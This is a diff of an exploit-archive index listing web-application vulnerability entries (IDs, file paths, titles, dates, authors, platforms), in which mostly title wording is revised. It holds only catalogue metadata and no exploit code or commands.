7440,platforms/asp/webapps/7440.txt,"ColdFusion Scripts Red_Reservations - Database Disclosure",2008-12-12,Cyber-Zone,asp,webapps,0
7441,platforms/php/webapps/7441.txt,"Joomla! Component live chat - (SQL Injection / Open Proxy) Multiple Vulnerabilities",2008-12-12,jdc,php,webapps,0
7443,platforms/php/webapps/7443.txt,"FlexPHPNews 0.0.6 & PRO - (Authentication Bypass) SQL Injection",2008-12-14,Osirys,php,webapps,0
7443,platforms/php/webapps/7443.txt,"FlexPHPNews 0.0.6 & PRO - Authentication Bypass",2008-12-14,Osirys,php,webapps,0
7444,platforms/php/webapps/7444.txt,"Simple Text-File Login script (SiTeFiLo) 1.0.6 - (File Disclosure / Remote File Inclusion) Multiple Vulnerabilities",2008-12-14,Osirys,php,webapps,0
7445,platforms/asp/webapps/7445.txt,"Discussion Web 4 - Remote Database Disclosure",2008-12-14,Pouya_Server,asp,webapps,0
7446,platforms/asp/webapps/7446.txt,"ASPired2Quote - 'quote.mdb' Remote Database Disclosure",2008-12-14,Pouya_Server,asp,webapps,0
@ -20457,7 +20464,7 @@ id,file,description,date,author,platform,type,port
7864,platforms/php/webapps/7864.py,"EPOLL SYSTEM 3.1 - (Password.dat) Disclosure",2009-01-25,Pouya_Server,php,webapps,0
7866,platforms/php/webapps/7866.txt,"Simple Machines Forum (SMF) 1.1.7 - Cross-Site Request Forgery / Cross-Site Scripting / Package Upload",2009-01-26,Xianur0,php,webapps,0
7867,platforms/php/webapps/7867.php,"ITLPoll 2.7 Stable2 - (index.php id) Blind SQL Injection",2009-01-26,fuzion,php,webapps,0
7872,platforms/asp/webapps/7872.txt,"E-ShopSystem - (Authentication Bypass / SQL Injection) Multiple Vulnerabilities",2009-01-26,InjEctOr5,asp,webapps,0
7872,platforms/asp/webapps/7872.txt,"E-ShopSystem - Authentication Bypass / SQL Injection",2009-01-26,InjEctOr5,asp,webapps,0
7873,platforms/php/webapps/7873.txt,"Script Toko Online 5.01 - (shop_display_products.php) SQL Injection",2009-01-26,k1n9k0ng,php,webapps,0
7874,platforms/php/webapps/7874.txt,"SHOP-INET 4 - 'show_cat2.php grid' SQL Injection",2009-01-26,FeDeReR,php,webapps,0
7876,platforms/php/webapps/7876.php,"PHP-CMS 1 - 'Username' Blind SQL Injection",2009-01-26,darkjoker,php,webapps,0
@ -20882,7 +20889,7 @@ id,file,description,date,author,platform,type,port
8642,platforms/php/webapps/8642.txt,"The Recipe Script 5 - (Authentication Bypass) SQL Injection / DB Backup",2009-05-08,TiGeR-Dz,php,webapps,0
8643,platforms/php/webapps/8643.txt,"Realty Web-Base 1.0 - (Authentication Bypass) SQL Injection",2009-05-08,"ThE g0bL!N",php,webapps,0
8645,platforms/php/webapps/8645.txt,"Luxbum 0.5.5/stable - (Authentication Bypass) SQL Injection",2009-05-08,knxone,php,webapps,0
8647,platforms/php/webapps/8647.txt,"Battle Blog 1.25 - (uploadform.asp) Arbitrary File Upload",2009-05-08,Cyber-Zone,php,webapps,0
8647,platforms/php/webapps/8647.txt,"Battle Blog 1.25 - 'uploadform.asp' Arbitrary File Upload",2009-05-08,Cyber-Zone,php,webapps,0
8648,platforms/php/webapps/8648.pl,"RTWebalbum 1.0.462 - 'albumID' Blind SQL Injection",2009-05-08,YEnH4ckEr,php,webapps,0
8649,platforms/php/webapps/8649.php,"TinyWebGallery 1.7.6 - Local File Inclusion / Remote Code Execution",2009-05-08,EgiX,php,webapps,0
8652,platforms/php/webapps/8652.pl,"eggBlog 4.1.1 - Local Directory Traversal",2009-05-11,StAkeR,php,webapps,0
@ -21706,7 +21713,7 @@ id,file,description,date,author,platform,type,port
10294,platforms/php/webapps/10294.txt,"OSI Codes PHP Live! Support 3.1 - Remote File Inclusion",2009-11-24,"Don Tukulesto",php,webapps,0
10297,platforms/php/webapps/10297.php,"Vivid Ads Shopping Cart - (prodid) SQL Injection",2009-12-03,"Yakir Wizman",php,webapps,0
10299,platforms/php/webapps/10299.txt,"GeN3 forum 1.3 - SQL Injection",2009-12-04,"Dr.0rYX AND Cr3W-DZ",php,webapps,0
10302,platforms/php/webapps/10302.txt,"427BB Fourtwosevenbb 2.3.2 - SQL Injection",2009-12-04,cr4wl3r,php,webapps,0
10302,platforms/php/webapps/10302.txt,"427BB 2.3.2 - SQL Injection",2009-12-04,cr4wl3r,php,webapps,0
10304,platforms/php/webapps/10304.txt,"Invision Power Board 3.0.4 / 3.0.4 / 2.3.6 - Local File Inclusion / SQL Injection",2009-12-04,"Dawid Golunski",php,webapps,0
10305,platforms/php/webapps/10305.txt,"UBB.Threads 7.5.4 2 - Multiple File Inclusion",2009-12-04,R3VAN_BASTARD,php,webapps,0
10306,platforms/php/webapps/10306.txt,"Achievo 1.4.2 - Arbitrary File Upload",2009-12-04,"Nahuel Grisolia",php,webapps,0
@ -22941,7 +22948,7 @@ id,file,description,date,author,platform,type,port
12396,platforms/php/webapps/12396.txt,"OpenCominterne 1.01 - Local File Inclusion",2010-04-26,cr4wl3r,php,webapps,0
12398,platforms/php/webapps/12398.txt,"Opencourrier 2.03beta - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion",2010-04-26,cr4wl3r,php,webapps,0
12399,platforms/php/webapps/12399.txt,"Uiga Personal Portal - 'index.php' (view) SQL Injection",2010-04-26,41.w4r10r,php,webapps,0
12400,platforms/php/webapps/12400.txt,"Joomla! Component 'com_joomradio' - SQL Injection",2010-04-26,Mr.tro0oqy,php,webapps,0
12400,platforms/php/webapps/12400.txt,"Joomla! Component JoomRadio 1.0 - SQL Injection",2010-04-26,Mr.tro0oqy,php,webapps,0
12402,platforms/php/webapps/12402.txt,"Kasseler CMS 2.0.5 - Bypass / Download Backup",2010-04-26,indoushka,php,webapps,0
12407,platforms/php/webapps/12407.txt,"CMScout 2.08 - SQL Injection",2010-04-26,"Dr.0rYX AND Cr3W-DZ",php,webapps,0
12410,platforms/php/webapps/12410.txt,"PostNuke 0.764 Module modload - SQL Injection",2010-04-26,BILGE_KAGAN,php,webapps,0
@ -23879,7 +23886,7 @@ id,file,description,date,author,platform,type,port
15046,platforms/php/webapps/15046.txt,"Fashione E-Commerce Webshop - Multiple SQL Injections",2010-09-19,secret,php,webapps,0
15049,platforms/php/webapps/15049.txt,"BoutikOne 1.0 - SQL Injection",2010-09-19,BrOx-Dz,php,webapps,0
15050,platforms/php/webapps/15050.txt,"Opencart 1.4.9.1 - Arbitrary File Upload",2010-09-19,Net.Edit0r,php,webapps,0
15100,platforms/win_x86/webapps/15100.txt,"Joomla! Component 'com_elite_experts' - SQL Injection",2010-09-24,**RoAd_KiLlEr**,win_x86,webapps,80
15100,platforms/win_x86/webapps/15100.txt,"Joomla! Component Elite Experts - SQL Injection",2010-09-24,**RoAd_KiLlEr**,win_x86,webapps,80
15058,platforms/asp/webapps/15058.html,"VWD-CMS - Cross-Site Request Forgery",2010-09-20,Abysssec,asp,webapps,0
15060,platforms/php/webapps/15060.txt,"LightNEasy CMS 3.2.1 - Blind SQL Injection",2010-09-20,Solidmedia,php,webapps,0
15064,platforms/php/webapps/15064.txt,"primitive CMS 1.0.9 - Multiple Vulnerabilities",2010-09-20,"Stephan Sattler",php,webapps,0
@ -24076,7 +24083,7 @@ id,file,description,date,author,platform,type,port
15486,platforms/php/webapps/15486.txt,"eBlog 1.7 - Multiple SQL Injections",2010-11-10,"Salvatore Fresta",php,webapps,0
15488,platforms/php/webapps/15488.txt,"Landesk - OS command Injection",2010-11-11,"Aureliano Calvo",php,webapps,0
15492,platforms/php/webapps/15492.php,"E-Xoopport 3.1 - eCal display.php (katid) SQL Injection",2010-11-11,"Vis Intelligendi",php,webapps,0
15497,platforms/asp/webapps/15497.txt,"ASPilot Pilot Cart 7.3 - newsroom.asp SQL Injection",2010-11-12,Daikin,asp,webapps,0
15497,platforms/asp/webapps/15497.txt,"ASPilot Pilot Cart 7.3 - 'newsroom.asp' SQL Injection",2010-11-12,Daikin,asp,webapps,0
15500,platforms/php/webapps/15500.txt,"Woltlab Burning Board 2.3.4 - File Disclosure",2010-11-12,sfx,php,webapps,0
15501,platforms/php/webapps/15501.txt,"Joomla! Component 'com_jsupport' - Cross-Site Scripting",2010-11-12,Valentin,php,webapps,0
15502,platforms/php/webapps/15502.txt,"Joomla! Component 'com_jsupport' - SQL Injection",2010-11-12,Valentin,php,webapps,0
@ -24784,7 +24791,7 @@ id,file,description,date,author,platform,type,port
17679,platforms/php/webapps/17679.txt,"WordPress Plugin Symposium 0.64 - SQL Injection",2011-08-17,"Miroslav Stampar",php,webapps,0
17680,platforms/php/webapps/17680.txt,"WordPress Plugin Easy Contact Form Lite 1.0.7 - SQL Injection",2011-08-17,"Miroslav Stampar",php,webapps,0
17681,platforms/php/webapps/17681.txt,"WordPress Plugin OdiHost NewsLetter 1.0 - SQL Injection",2011-08-17,"Miroslav Stampar",php,webapps,0
17682,platforms/php/webapps/17682.php,"Contrexx ShopSystem 2.2 SP3 (catId) - Blind SQL Injection",2011-08-17,Penguin,php,webapps,0
17682,platforms/php/webapps/17682.php,"Contrexx ShopSystem 2.2 SP3 - 'catId' Parameter Blind SQL Injection",2011-08-17,Penguin,php,webapps,0
17683,platforms/php/webapps/17683.txt,"WordPress Plugin DS FAQ 1.3.2 - SQL Injection",2011-08-18,"Miroslav Stampar",php,webapps,0
17684,platforms/php/webapps/17684.txt,"WordPress Plugin Forum 1.7.8 - SQL Injection",2011-08-18,"Miroslav Stampar",php,webapps,0
17685,platforms/php/webapps/17685.txt,"Elgg 1.7.10 - Multiple Vulnerabilities",2011-08-18,"Aung Khant",php,webapps,0
@ -25000,7 +25007,7 @@ id,file,description,date,author,platform,type,port
18095,platforms/php/webapps/18095.txt,"11in1 CMS 1.0.1 - 'do.php' CRLF Injection",2011-11-08,LiquidWorm,php,webapps,0
18099,platforms/php/webapps/18099.txt,"osCSS2 - '_ID' Parameter Local file Inclusion",2011-11-09,"Stefan Schurtz",php,webapps,0
18100,platforms/php/webapps/18100.txt,"labwiki 1.1 - Multiple Vulnerabilities",2011-11-09,muuratsalo,php,webapps,0
18101,platforms/hardware/webapps/18101.pl,"Comtrend Router CT-5624 - Remote Root/Support Password Disclosure/Change Exploit",2011-11-09,"Todor Donev",hardware,webapps,0
18101,platforms/hardware/webapps/18101.pl,"Comtrend Router CT-5624 - Root/Support Password Disclosure/Change Exploit",2011-11-09,"Todor Donev",hardware,webapps,0
18108,platforms/php/webapps/18108.rb,"Support Incident Tracker 3.65 - Remote Command Execution (Metasploit)",2011-11-13,Metasploit,php,webapps,0
18110,platforms/php/webapps/18110.txt,"Mambo 4.x - 'Zorder' SQL Injection",2011-11-13,"KraL BeNiM",php,webapps,0
18111,platforms/php/webapps/18111.php,"WordPress Plugin Zingiri 2.2.3 - (ajax_save_name.php) Remote Code Execution",2011-11-13,EgiX,php,webapps,0
@ -25506,7 +25513,7 @@ id,file,description,date,author,platform,type,port
20352,platforms/windows/webapps/20352.py,"afterlogic mailsuite pro (VMware Appliance) 6.3 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps,0
20353,platforms/windows/webapps/20353.py,"mailtraq 2.17.3.3150 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps,0
20356,platforms/windows/webapps/20356.py,"ManageEngine ServiceDesk Plus 8.1 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps,0
20357,platforms/windows/webapps/20357.py,"alt-n mdaemon free 12.5.4 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps,0
20357,platforms/windows/webapps/20357.py,"Alt-N MDaemon free 12.5.4 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps,0
20358,platforms/php/webapps/20358.py,"WordPress Plugin mini mail Dashboard widget 1.42 - Persistent Cross-Site Scripting",2012-08-08,loneferret,php,webapps,0
20359,platforms/windows/webapps/20359.py,"OTRS Open Technology Real Services 3.1.4 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps,0
20360,platforms/php/webapps/20360.py,"WordPress Plugin postie 1.4.3 - Persistent Cross-Site Scripting",2012-08-08,loneferret,php,webapps,0
@ -26234,7 +26241,7 @@ id,file,description,date,author,platform,type,port
22921,platforms/asp/webapps/22921.txt,".netCART Settings.XML - Information Disclosure",2003-07-16,G00db0y,asp,webapps,0
22922,platforms/php/webapps/22922.txt,"Ultimate Bulletin Board 6.0/6.2 - UBBER Cookie HTML Injection",2003-07-16,anti_acid,php,webapps,0
22925,platforms/php/webapps/22925.txt,"eStore 1.0.1/1.0.2 - Settings.inc.php Full Path Disclosure",2003-07-17,Bosen,php,webapps,0
22927,platforms/php/webapps/22927.txt,"SimpNews 2.0.1/2.13 - PATH_SIMPNEWS Remote File Inclusion",2003-07-18,PUPET,php,webapps,0
22927,platforms/php/webapps/22927.txt,"SimpNews 2.0.1/2.13 - 'path_simpnews' Parameter Remote File Inclusion",2003-07-18,PUPET,php,webapps,0
22929,platforms/php/webapps/22929.txt,"BuyClassifiedScript - PHP Code Injection",2012-11-26,d3b4g,php,webapps,0
22961,platforms/php/webapps/22961.txt,"Gallery 1.2/1.3.x - Search Engine Cross-Site Scripting",2003-07-27,"Larry Nguyen",php,webapps,0
23008,platforms/php/webapps/23008.txt,"DCForum+ 1.2 - Subject Field HTML Injection",2003-08-11,G00db0y,php,webapps,0
@ -27246,7 +27253,7 @@ id,file,description,date,author,platform,type,port
25177,platforms/php/webapps/25177.txt,"CutePHP CuteNews 1.3.6 - x-forwarded-for Script Injection",2005-03-01,FraMe,php,webapps,0
25178,platforms/php/webapps/25178.txt,"427BB 2.x - Multiple Remote HTML Injection Vulnerabilities",2005-03-01,"Hackerlounge Research Group",php,webapps,0
25179,platforms/php/webapps/25179.txt,"PBLang Bulletin Board System 4.x - DelPM.php Arbitrary Personal Message Deletion",2005-03-01,Raven,php,webapps,0
25180,platforms/php/webapps/25180.py,"PHPNews 1.2.3/1.2.4 - auth.php Remote File Inclusion",2005-03-01,mozako,php,webapps,0
25180,platforms/php/webapps/25180.py,"PHPNews 1.2.3/1.2.4 - 'auth.php' Remote File Inclusion",2005-03-01,mozako,php,webapps,0
25197,platforms/php/webapps/25197.txt,"PHP-Fusion 5.0 - BBCode IMG Tag Script Injection",2005-03-08,FireSt0rm,php,webapps,0
25198,platforms/jsp/webapps/25198.txt,"OutStart Participate Enterprise 3 - Multiple Access Validation Vulnerabilities",2005-03-08,Altrus,jsp,webapps,0
25199,platforms/php/webapps/25199.txt,"YaBB 2.0 - Remote UsersRecentPosts Cross-Site Scripting",2005-03-08,trueend5,php,webapps,0
@ -27298,8 +27305,8 @@ id,file,description,date,author,platform,type,port
25262,platforms/php/webapps/25262.txt,"Interspire ArticleLive 2005 - NewComment Cross-Site Scripting",2005-03-23,mircia,php,webapps,0
25263,platforms/php/webapps/25263.txt,"DigitalHive 2.0 - msg.php Cross-Site Scripting",2005-03-23,"benji lemien",php,webapps,0
25264,platforms/php/webapps/25264.txt,"DigitalHive 2.0 - membres.php mt Parameter Cross-Site Scripting",2005-03-23,"benji lemien",php,webapps,0
25265,platforms/php/webapps/25265.txt,"PHPSysInfo 2.0/2.3 - 'index.php' sensor_program Parameter Cross-Site Scripting",2005-03-23,"Maksymilian Arciemowicz",php,webapps,0
25266,platforms/php/webapps/25266.txt,"PHPSysInfo 2.0/2.3 - system_footer.php Multiple Parameter Cross-Site Scripting",2005-03-23,"Maksymilian Arciemowicz",php,webapps,0
25265,platforms/php/webapps/25265.txt,"PHPSysInfo 2.0/2.3 - 'sensor_program' Parameter Cross-Site Scripting",2005-03-23,"Maksymilian Arciemowicz",php,webapps,0
25266,platforms/php/webapps/25266.txt,"PHPSysInfo 2.0/2.3 - 'system_footer.php' Cross-Site Scripting",2005-03-23,"Maksymilian Arciemowicz",php,webapps,0
25267,platforms/php/webapps/25267.txt,"Invision Power Board 1.x/2.0 - HTML Injection",2005-03-23,"Woody Hughes",php,webapps,0
25269,platforms/jsp/webapps/25269.txt,"Oracle Reports Server 10g - Multiple Cross-Site Scripting Vulnerabilities",2005-03-24,Paolo,jsp,webapps,0
25270,platforms/php/webapps/25270.txt,"Topic Calendar 1.0.1 - Calendar_Scheduler.php Cross-Site Scripting",2004-03-24,"Alberto Trivero",php,webapps,0
@ -27824,7 +27831,7 @@ id,file,description,date,author,platform,type,port
25963,platforms/asp/webapps/25963.txt,"Dragonfly Commerce 1.0 - Multiple SQL Injections",2005-07-12,"Diabolic Crab",asp,webapps,0
25964,platforms/php/webapps/25964.c,"PHPsFTPd 0.2/0.4 - Inc.login.php Privilege Escalation",2005-07-11,"Stefan Lochbihler",php,webapps,0
25965,platforms/asp/webapps/25965.txt,"DVBBS 7.1 - ShowErr.asp Cross-Site Scripting",2005-07-12,rUnViRuS,asp,webapps,0
25968,platforms/hardware/webapps/25968.pl,"Seowonintech Routers fw: 2.3.9 - Remote Root File Disclosure",2013-06-05,"Todor Donev",hardware,webapps,0
25968,platforms/hardware/webapps/25968.pl,"Seowonintech Routers fw: 2.3.9 - File Disclosure",2013-06-05,"Todor Donev",hardware,webapps,0
25969,platforms/hardware/webapps/25969.txt,"Netgear WPN824v3 - Unauthorized Config Download",2013-06-05,"Jens Regel",hardware,webapps,0
25971,platforms/php/webapps/25971.txt,"Cuppa CMS - 'alertConfigField.php' Remote / Local File Inclusion",2013-06-05,"CWH Underground",php,webapps,0
25973,platforms/php/webapps/25973.txt,"Ruubikcms 1.1.1 - (tinybrowser.php folder Parameter) Directory Traversal",2013-06-05,expl0i13r,php,webapps,0
@ -27851,7 +27858,7 @@ id,file,description,date,author,platform,type,port
26009,platforms/php/webapps/26009.txt,"AfterLogic WebMail Lite PHP 7.0.1 - Cross-Site Request Forgery",2013-06-07,"Pablo Ribeiro",php,webapps,0
26014,platforms/php/webapps/26014.txt,"FForm Sender 1.0 - Processform.php3 Name Cross-Site Scripting",2005-07-19,rgod,php,webapps,0
26015,platforms/php/webapps/26015.txt,"Form Sender 1.0 - Processform.php3 Failed Cross-Site Scripting",2005-07-19,rgod,php,webapps,0
26016,platforms/php/webapps/26016.txt,"PHPNews 1.2.x - auth.php SQL Injection",2005-07-20,GHC,php,webapps,0
26016,platforms/php/webapps/26016.txt,"PHPNews 1.2.x - 'auth.php' SQL Injection",2005-07-20,GHC,php,webapps,0
26017,platforms/cgi/webapps/26017.txt,"Greasemonkey 0.3.3 - Multiple Remote Information Disclosure Vulnerabilities",2005-07-20,"Mark Pilgrim",cgi,webapps,0
26018,platforms/php/webapps/26018.txt,"Pyrox Search 1.0.5 - Newsearch.php Whatdoreplace Cross-Site Scripting",2005-07-21,rgod,php,webapps,0
26019,platforms/php/webapps/26019.txt,"Contrexx 1.0.4 - Multiple Input Validation Vulnerabilities",2005-07-22,"Christopher Kunz",php,webapps,0
@ -28284,10 +28291,10 @@ id,file,description,date,author,platform,type,port
26588,platforms/php/webapps/26588.txt,"Orca Forum 4.3 - forum.php SQL Injection",2005-11-24,r0t3d3Vil,php,webapps,0
26589,platforms/php/webapps/26589.txt,"OvBB 0.x - thread.php threadid Parameter SQL Injection",2005-11-24,r0t3d3Vil,php,webapps,0
26590,platforms/php/webapps/26590.txt,"OvBB 0.x - profile.php userid Parameter SQL Injection",2005-11-24,r0t3d3Vil,php,webapps,0
26591,platforms/php/webapps/26591.txt,"efiction 1.0/1.1/2.0 - titles.php let Parameter Cross-Site Scripting",2005-11-25,retrogod@aliceposta.it,php,webapps,0
26592,platforms/php/webapps/26592.txt,"efiction 1.0/1.1/2.0 - titles.php let Parameter SQL Injection",2005-11-25,retrogod@aliceposta.it,php,webapps,0
26593,platforms/php/webapps/26593.txt,"efiction 1.0/1.1/2.0 - viewstory.php sid Parameter SQL Injection",2005-11-25,retrogod@aliceposta.it,php,webapps,0
26594,platforms/php/webapps/26594.txt,"efiction 1.0/1.1/2.0 - viewuser.php uid Parameter SQL Injection",2005-11-25,retrogod@aliceposta.it,php,webapps,0
26591,platforms/php/webapps/26591.txt,"efiction 1.0/1.1/2.0 - 'titles.php' Cross-Site Scripting",2005-11-25,retrogod@aliceposta.it,php,webapps,0
26592,platforms/php/webapps/26592.txt,"efiction 1.0/1.1/2.0 - 'titles.php' SQL Injection",2005-11-25,retrogod@aliceposta.it,php,webapps,0
26593,platforms/php/webapps/26593.txt,"efiction 1.0/1.1/2.0 - 'sid' Parameter SQL Injection",2005-11-25,retrogod@aliceposta.it,php,webapps,0
26594,platforms/php/webapps/26594.txt,"efiction 1.0/1.1/2.0 - 'uid' Parameter SQL Injection",2005-11-25,retrogod@aliceposta.it,php,webapps,0
26595,platforms/php/webapps/26595.txt,"IsolSoft Support Center 2.2 - Multiple SQL Injections",2005-11-25,r0t3d3Vil,php,webapps,0
26596,platforms/php/webapps/26596.txt,"AgileBill 1.4.92 - Product_Cat SQL Injection",2005-11-25,r0t,php,webapps,0
26597,platforms/php/webapps/26597.txt,"PBLang Bulletin Board System 4.65 - Multiple HTML Injection Vulnerabilities",2005-11-26,r0xes,php,webapps,0
@ -28676,7 +28683,7 @@ id,file,description,date,author,platform,type,port
27360,platforms/php/webapps/27360.txt,"RunCMS 1.x - 'Bigshow.php' Cross-Site Scripting",2006-03-06,"Roozbeh Afrasiabi",php,webapps,0
27042,platforms/ios/webapps/27042.txt,"Photo Server 2.0 iOS - Multiple Vulnerabilities",2013-07-23,Vulnerability-Lab,ios,webapps,0
27048,platforms/php/webapps/27048.txt,"AppServ Open Project 2.4.5 - Remote File Inclusion",2006-01-09,Xez,php,webapps,0
27052,platforms/php/webapps/27052.txt,"427BB 2.2 - showthread.php SQL Injection",2006-01-09,"Aliaksandr Hartsuyeu",php,webapps,0
27052,platforms/php/webapps/27052.txt,"427BB 2.2 - 'showthread.php' SQL Injection",2006-01-09,"Aliaksandr Hartsuyeu",php,webapps,0
27053,platforms/php/webapps/27053.txt,"Venom Board - Post.php3 Multiple SQL Injection",2006-01-09,"Aliaksandr Hartsuyeu",php,webapps,0
27054,platforms/php/webapps/27054.txt,"427BB 2.2 - Authentication Bypass",2006-01-09,"Aliaksandr Hartsuyeu",php,webapps,0
27058,platforms/php/webapps/27058.txt,"PHP-Nuke 7.7 EV Search Module - SQL Injection",2006-01-09,Lostmon,php,webapps,0
@ -28749,7 +28756,6 @@ id,file,description,date,author,platform,type,port
27147,platforms/php/webapps/27147.txt,"PmWiki 2.1 - Multiple Input Validation Vulnerabilities",2006-01-30,aScii,php,webapps,0
27149,platforms/php/webapps/27149.txt,"Ashwebstudio Ashnews 0.83 - Cross-Site Scripting",2006-01-30,0o_zeus_o0,php,webapps,0
27151,platforms/asp/webapps/27151.txt,"Daffodil CRM 1.5 - Userlogin.asp SQL Injection",2006-01-30,preben@watchcom.no,asp,webapps,0
27152,platforms/php/webapps/27152.txt,"BrowserCRM - results.php Cross-Site Scripting",2006-01-31,preben@watchcom.no,php,webapps,0
27153,platforms/php/webapps/27153.txt,"Cerberus Helpdesk 2.7 - Clients.php Cross-Site Scripting",2006-01-31,preben@watchcom.no,php,webapps,0
27154,platforms/php/webapps/27154.txt,"Farsinews 2.1 - Loginout.php Remote File Inclusion",2006-01-31,"Hamid Ebadi",php,webapps,0
27155,platforms/php/webapps/27155.txt,"MyBB 1.0/1.1 - 'index.php' Referrer Cookie SQL Injection",2006-01-31,Devil-00,php,webapps,0
@ -29383,7 +29389,7 @@ id,file,description,date,author,platform,type,port
28016,platforms/php/webapps/28016.txt,"DoubleSpeak 0.1 - Multiple Remote File Inclusion",2006-06-13,R@1D3N,php,webapps,0
28017,platforms/php/webapps/28017.txt,"CEScripts - Multiple Scripts Cross-Site Scripting Vulnerabilities",2006-06-13,Luny,php,webapps,0
28018,platforms/php/webapps/28018.txt,"VBZoom 1.0/1.1 - Multiple SQL Injections",2006-06-13,"CrAzY CrAcKeR",php,webapps,0
28019,platforms/php/webapps/28019.txt,"Simpnews 2.x - Wap_short_news.php Remote File Inclusion",2006-06-13,SpC-x,php,webapps,0
28019,platforms/php/webapps/28019.txt,"Simpnews 2.x - 'Wap_short_news.php' Remote File Inclusion",2006-06-13,SpC-x,php,webapps,0
28020,platforms/php/webapps/28020.txt,"Andy Mack 35mm Slide Gallery 6.0 - 'index.php' imgdir Parameter Cross-Site Scripting",2006-06-13,black-cod3,php,webapps,0
28021,platforms/php/webapps/28021.txt,"Andy Mack 35mm Slide Gallery 6.0 - popup.php Multiple Parameter Cross-Site Scripting",2006-06-13,black-cod3,php,webapps,0
28022,platforms/php/webapps/28022.txt,"Woltlab Burning Board 2.x - Multiple SQL Injections",2006-06-14,"CrAzY CrAcKeR",php,webapps,0
@ -29553,7 +29559,7 @@ id,file,description,date,author,platform,type,port
28280,platforms/php/webapps/28280.txt,"wwwThreads - calendar.php Cross-Site Scripting",2006-07-26,l2odon,php,webapps,0
28281,platforms/php/webapps/28281.txt,"phpBB-Auction 1.x - auction_room.php ar Parameter SQL Injection",2006-07-26,l2odon,php,webapps,0
28282,platforms/php/webapps/28282.txt,"phpBB-Auction 1.x - auction_store.php u Parameter SQL Injection",2006-07-26,l2odon,php,webapps,0
28283,platforms/hardware/webapps/28283.txt,"ZYXEL Prestige 660H-61 ADSL Router - RPSysAdmin.HTML Cross-Site Scripting",2006-07-27,jose.palanco,hardware,webapps,0
28283,platforms/hardware/webapps/28283.txt,"ZYXEL Prestige 660H-61 ADSL Router - Cross-Site Scripting",2006-07-27,jose.palanco,hardware,webapps,0
28289,platforms/php/webapps/28289.txt,"Bosdates 3.x/4.0 - Payment.php Remote File Inclusion",2006-07-27,admin@jaascois.com,php,webapps,0
28291,platforms/php/webapps/28291.txt,"MyBulletinBoard 1.x - 'usercp.php' Directory Traversal",2006-07-27,"Roozbeh Afrasiabi",php,webapps,0
28292,platforms/php/webapps/28292.txt,"GeoClassifieds Enterprise 2.0.5.x - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-07-27,"EllipSiS Security",php,webapps,0
@ -29862,9 +29868,9 @@ id,file,description,date,author,platform,type,port
28730,platforms/php/webapps/28730.txt,"OlateDownload 3.4 - details.php page Parameter SQL Injection",2006-09-29,Hessam-x,php,webapps,0
28727,platforms/php/webapps/28727.txt,"Les Visiteurs 2.0 - Multiple Remote File Inclusion",2006-09-28,D_7J,php,webapps,0
28731,platforms/php/webapps/28731.txt,"OlateDownload 3.4 - search.php query Parameter SQL Injection",2006-09-29,Hessam-x,php,webapps,0
28732,platforms/php/webapps/28732.txt,"Yblog - funk.php id Parameter Cross-Site Scripting",2006-09-30,You_You,php,webapps,0
28733,platforms/php/webapps/28733.txt,"Yblog - tem.php action Parameter Cross-Site Scripting",2006-09-30,You_You,php,webapps,0
28734,platforms/php/webapps/28734.txt,"Yblog - uss.php action Parameter Cross-Site Scripting",2006-09-30,You_You,php,webapps,0
28732,platforms/php/webapps/28732.txt,"Yblog - 'funk.php' Cross-Site Scripting",2006-09-30,You_You,php,webapps,0
28733,platforms/php/webapps/28733.txt,"Yblog - 'tem.php' Cross-Site Scripting",2006-09-30,You_You,php,webapps,0
28734,platforms/php/webapps/28734.txt,"Yblog - 'uss.php' Cross-Site Scripting",2006-09-30,You_You,php,webapps,0
29275,platforms/cgi/webapps/29275.txt,"Netwin SurgeFTP 2.3a1 - SurgeFTPMGR.cgi Multiple Input Validation Vulnerabilities",2006-12-11,"Umesh Wanve",cgi,webapps,0
29276,platforms/asp/webapps/29276.txt,"Lotfian Request For Travel 1.0 - ProductDetails.asp SQL Injection",2006-12-11,ajann,asp,webapps,0
28728,platforms/php/webapps/28728.txt,"Geotarget - script.php Remote File Inclusion",2006-09-29,"RaVeR shi mozi",php,webapps,0
@ -29967,8 +29973,8 @@ id,file,description,date,author,platform,type,port
28851,platforms/php/webapps/28851.txt,"Crafty Syntax Live Help 2.9.9 - Multiple Remote File Inclusion",2006-10-24,Crackers_Child,php,webapps,0
28854,platforms/multiple/webapps/28854.txt,"Imperva SecureSphere Web Application Firewall MX 9.5.6 - Blind SQL Injection",2013-10-10,"Giuseppe D'Amore",multiple,webapps,0
28857,platforms/asp/webapps/28857.txt,"Snitz Forums 2000 3.4.6 - Pop_Mail.asp SQL Injection",2006-10-24,"Arham Muhammad",asp,webapps,0
28858,platforms/php/webapps/28858.txt,"Simpnews 2.x - admin/index.php Unspecified Cross-Site Scripting",2006-10-24,security@vigilon.com,php,webapps,0
28859,platforms/php/webapps/28859.txt,"Simpnews 2.x - admin/pwlost.php Unspecified Cross-Site Scripting",2006-10-24,security@vigilon.com,php,webapps,0
28858,platforms/php/webapps/28858.txt,"Simpnews 2.x - 'index.php' Cross-Site Scripting",2006-10-24,security@vigilon.com,php,webapps,0
28859,platforms/php/webapps/28859.txt,"Simpnews 2.x - 'pwlost.php' Cross-Site Scripting",2006-10-24,security@vigilon.com,php,webapps,0
28861,platforms/php/webapps/28861.txt,"Comment IT 0.2 - PathToComment Parameter Remote File Inclusion",2006-10-25,"Cold Zero",php,webapps,0
28862,platforms/php/webapps/28862.txt,"PHPMyConferences 8.0.2 - Init.php Remote File Inclusion",2006-10-25,The-0utl4w,php,webapps,0
28863,platforms/php/webapps/28863.txt,"MAXdev MD-Pro 1.0.76 - user.php Cross-Site Scripting",2006-10-26,r00t,php,webapps,0
@ -30212,7 +30218,7 @@ id,file,description,date,author,platform,type,port
29145,platforms/php/webapps/29145.txt,"Wabbit PHP Gallery 0.9 - Dir Parameter Directory Traversal",2006-11-20,the_Edit0r,php,webapps,0
29162,platforms/php/webapps/29162.txt,"My Little Weblog 2006.11.21 - Weblog.php Cross-Site Scripting",2006-11-21,the_Edit0r,php,webapps,0
29217,platforms/php/webapps/29217.txt,"CuteNews 1.3.6 - Result Parameter Cross-Site Scripting",2006-12-02,Detefix,php,webapps,0
